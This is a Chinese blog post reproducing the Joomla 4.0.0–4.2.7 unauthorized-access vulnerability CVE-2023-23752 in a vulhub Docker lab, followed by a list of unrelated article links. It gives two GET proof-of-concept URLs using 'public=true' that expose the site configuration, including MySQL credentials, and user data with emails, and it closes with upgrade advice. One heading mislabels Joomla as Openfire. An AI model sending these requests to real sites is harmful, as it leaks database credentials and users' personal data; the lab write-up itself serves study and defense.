当前位置: 首页 > news >正文

CVE-2023-23752:Joomla未授权访问漏洞复现

CVE-2023-23752:Joomla未授权访问漏洞复现

前言

本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!

一.Openfire简介

Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。

二.漏洞简述

在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。

三.漏洞原理

CVE-2023-23752 是身份验证绕过,导致 Joomla 信息泄露。

四.影响版本

4.0.0 <= Joomla <= 4.2.7

五.环境搭建

在kali的docker中搭建vulhub进行漏洞复现
clone项目:

 sudo git clone https://github.com/vulhub/vulhub.git

在这里插入图片描述在/joomla/CVE-2023-23752/目录,用下面的命令下载并启动:

sudo docker-compose up -d

在这里插入图片描述搞定,查看环境:

sudo docker-compose ps

在这里插入图片描述看到端口,这里是8080。

在浏览器上访问http://your-ip:8080

进入环境,说明配置成功了,接下来就可以开始愉快的漏洞复现了:

在这里插入图片描述

六.漏洞复现

Joomla 大致有三个路由入口,分别是:

根目录的index.php(用户访问文章)
根目录的administrator/index.php(管理员管理)
根目录的api/index.php(开发者爱好的Rest API)

未授权的接口正是第三个入口,因此受影响范围为 Joomla4.0.0——Joomla4.2.7(Rest API 4.x正式开发)
1.漏洞利用
此问题是由属性覆盖问题引起的,攻击者可以使用 public=true 以绕过授权检查。
例如,通过以下POC1公开所有配置,包括MySQL用户名和密码:
POC1(GET)

http://your-ip:8080/api/index.php/v1/config/application?public=true

在这里插入图片描述在这里插入图片描述POC2(GET)

http://your-ip:8080/api/index.php/v1/users?public=true

通过以以上POC公开所有用户信息,包括电子邮件:
在这里插入图片描述
我们发现了用户信息以及用户电子邮件。

七.修复建议

目前官方已发布安全版本修复此漏洞,建议存在风险的用户及时升级到安全版本。
安全版本:Joomla >= 4.2.8

下载链接:

https://downloads.joomla.org/
http://www.lryc.cn/news/152198.html

相关文章:

  • MATLAB中circshift函数转化为C语言
  • 浅谈React生命周期
  • 基于龙格-库塔算法优化的BP神经网络(预测应用) - 附代码
  • C++ 获取进程信息
  • 【Redis从头学-13】Redis哨兵模式解析以及搭建指南
  • 【个人笔记js的原型理解】
  • Liunx系统编程:信号量
  • 大集合按照指定长度进行分割成多个小集合,用于批量多次处理数据
  • ELK日志收集系统集群实验(5.5.0版)
  • 基于java swing和mysql实现的电影票购票管理系统(源码+数据库+运行指导视频)
  • 数据结构--6.0最短路径
  • Docker进阶:mysql 主从复制、redis集群3主3从【扩缩容案例】
  • 遗传算法决策变量降维的matlab实现
  • 基于Open3D和PyTorch3D读取三维数据格式OBJ
  • 带纽扣电池产品出口澳洲安全标准,纽扣电池IEC 60086认证
  • spring高级源码50讲-37-42(springBoot)
  • 腾讯云、阿里云、华为云便宜云服务器活动整理汇总
  • L1-055 谁是赢家(Python实现) 测试点全过
  • 开发一个npm包
  • 介绍几种使用工具
  • Vue:关于声明式导航中的 跳转、高亮、以及两个类名的定制
  • Sharding-JDBC分库分表-自动配置与分片规则加载原理-3
  • E8267D 是德科技矢量信号发生器
  • Git git fetch 和 git pull 区别
  • 软件UI工程师工作的岗位职责(合集)
  • Mac系统Anaconda环境配置Python的json库
  • Python数据分析与数据挖掘:解析数据的力量
  • 我的私人笔记(安装hive)
  • 【kubernetes】k8s部署APISIX及在KubeSphere使用APISIX
  • 串口接收数据-控制LED灯